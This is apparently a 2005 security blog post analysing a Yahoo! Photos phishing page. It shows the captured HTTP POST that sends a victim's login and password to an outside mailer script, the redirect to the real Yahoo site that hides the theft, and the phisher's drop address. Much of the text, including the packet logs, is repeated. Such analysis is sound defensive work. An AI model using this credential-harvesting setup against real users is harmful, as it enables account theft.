This post is an update to yesterday’s post,
which reports of a newly spotted Yahoo! Photos phishing site. If
you haven’t read it yet, I suggest that you read it before
continuing with this post.
As mentioned in the title, this is an analysis of the mentioned
Yahoo! Photos phish, with emphasis on the how the credentials are
stolen, and where those stolen credentials ultimately end.
The Yahoo! Photos phish (that shall be henceforth known as the
“phish”) contains a form, consisting of two input text boxes (the
Yahoo! ID and Password boxes), a checkbox, and a submit button. A
portion of the form is composed of the following HTML code.
The encoded strings is equivalent to the following
The phish, after clicking the “Sign IN” button, does an HTTP POST
to a certain mailto.cgi, presumed to be a mailer CGI. This CGI file
sits in a server somewhere in Japan.
The variables are remarkably similar to the phish (also a Yahoo!
phish) discussed in this article.
/?p=38
As a test, I saved a local copy of the phish, and modified the
“Mail_To” variable and replace it with my “spambox” email address,
let’s pretend that that email address is
“spambox@somewhere.com”.
Then I placed “username” in the Yahoo! ID field and “password” in
the Password field, and clicked the “Sign In” button.
My packet log (courtesy of Ethereal) showed the following (text
wraps)
As can be seen above, the phish POSTed the following
variables
Take note of the “login” and “passwd” variable. Sweet.
The mailto.cgi, after receiving the HTTP POST, returns an HTTP 302
status code, meaning that the target page is “moved temporarily”,
and that the browser will be redirected to another page specified
in the Location field of the response.
So, after clicking on the “Sign In” button, the user is redirected
to the site http://photos.yahoo.com/ph//my_photos, which is the
value of the “Next_Page” variable. This redirection to the
legitimate Yahoo! Photos page make the phish look like it is really
the proper Yahoo! Photos site.
But what happened to the other variables?
Apparently, the mailto.cgi, which is presumed to be a mailer CGI,
mailed all those info to the email address specifed in the
“Mail_To” variable. Checking my spambox@somewhere.com mailbox, I
found this email.
The Yahoo! ID and the password can be clearly seen. However, most
of the email text is in Japanese, so I don’t know what the rest of
the email says. :)
Old-time readers will probably notice that the methodology used in
this testing is similar to the one used in this post.
This is not at all surprising, since there is uncanny similarity in
the structure of both phishing sites. This particular phish sends
the stolen credentials to this email address:
oxox0o_angel_oxox0o@yahoo.com
As mentioned in yesterday’s post, this indicates that there is a
kit available for Yahoo! phish. The availability of this kit makes
setting up a phishing site much more easier.
which reports of a newly spotted Yahoo! Photos phishing site. If
you haven’t read it yet, I suggest that you read it before
continuing with this post.
As mentioned in the title, this is an analysis of the mentioned
Yahoo! Photos phish, with emphasis on the how the credentials are
stolen, and where those stolen credentials ultimately end.
The Yahoo! Photos phish (that shall be henceforth known as the
“phish”) contains a form, consisting of two input text boxes (the
Yahoo! ID and Password boxes), a checkbox, and a submit button. A
portion of the form is composed of the following HTML code.
The encoded strings is equivalent to the following
The phish, after clicking the “Sign IN” button, does an HTTP POST
to a certain mailto.cgi, presumed to be a mailer CGI. This CGI file
sits in a server somewhere in Japan.
The variables are remarkably similar to the phish (also a Yahoo!
phish) discussed in this article.
/?p=38
As a test, I saved a local copy of the phish, and modified the
“Mail_To” variable and replace it with my “spambox” email address,
let’s pretend that that email address is
“spambox@somewhere.com”.
Then I placed “username” in the Yahoo! ID field and “password” in
the Password field, and clicked the “Sign In” button.
My packet log (courtesy of Ethereal) showed the following (text
wraps)
POST
http://www2.fiberbit.net/form/mailto.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;
q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Content-Type: application/x-www-form-urlencoded
Content-length: 168
Host: www2.fiberbit.net
Proxy-Connection: Keep-Alive
Mail_From=Yahoo&Mail_To=spambox@somewhere.com&Mail_Subject=Yahoo+id&
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos
&login=username&passwd=password&.save=Sign+In
http://www2.fiberbit.net/form/mailto.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;
q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Content-Type: application/x-www-form-urlencoded
Content-length: 168
Host: www2.fiberbit.net
Proxy-Connection: Keep-Alive
Mail_From=Yahoo&Mail_To=spambox@somewhere.com&Mail_Subject=Yahoo+id&
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos
&login=username&passwd=password&.save=Sign+In
As can be seen above, the phish POSTed the following
variables
Mail_From=Yahoo
Mail_To=spambox@somewhere.com
Mail_Subject=Yahoo+id
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos
login=username
passwd=password
.save=Sign+In
Mail_To=spambox@somewhere.com
Mail_Subject=Yahoo+id
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos
login=username
passwd=password
.save=Sign+In
Take note of the “login” and “passwd” variable. Sweet.
The mailto.cgi, after receiving the HTTP POST, returns an HTTP 302
status code, meaning that the target page is “moved temporarily”,
and that the browser will be redirected to another page specified
in the Location field of the response.
HTTP/1.1 302 Found
Connection: close
Proxy-Connection: close
Date: Wed, 30 Nov 2005 06:18:44 GMT
Location: http://photos.yahoo.com/ph//my_photos
Content-Type: text/html; charset=iso-8859-1
Server: Apache/1.3.26 (Unix) mod_perl/1.26
302 Found
The document has movedHREF=”http://photos.yahoo.com/ph//my_photos”>here.
Connection: close
Proxy-Connection: close
Date: Wed, 30 Nov 2005 06:18:44 GMT
Location: http://photos.yahoo.com/ph//my_photos
Content-Type: text/html; charset=iso-8859-1
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Found
The document has moved
So, after clicking on the “Sign In” button, the user is redirected
to the site http://photos.yahoo.com/ph//my_photos, which is the
value of the “Next_Page” variable. This redirection to the
legitimate Yahoo! Photos page make the phish look like it is really
the proper Yahoo! Photos site.
But what happened to the other variables?
Apparently, the mailto.cgi, which is presumed to be a mailer CGI,
mailed all those info to the email address specifed in the
“Mail_To” variable. Checking my spambox@somewhere.com mailbox, I
found this email.
The Yahoo! ID and the password can be clearly seen. However, most
of the email text is in Japanese, so I don’t know what the rest of
the email says. :)
Old-time readers will probably notice that the methodology used in
this testing is similar to the one used in this post.
This is not at all surprising, since there is uncanny similarity in
the structure of both phishing sites. This particular phish sends
the stolen credentials to this email address:
oxox0o_angel_oxox0o@yahoo.com
As mentioned in yesterday’s post, this indicates that there is a
kit available for Yahoo! phish. The availability of this kit makes
setting up a phishing site much more easier.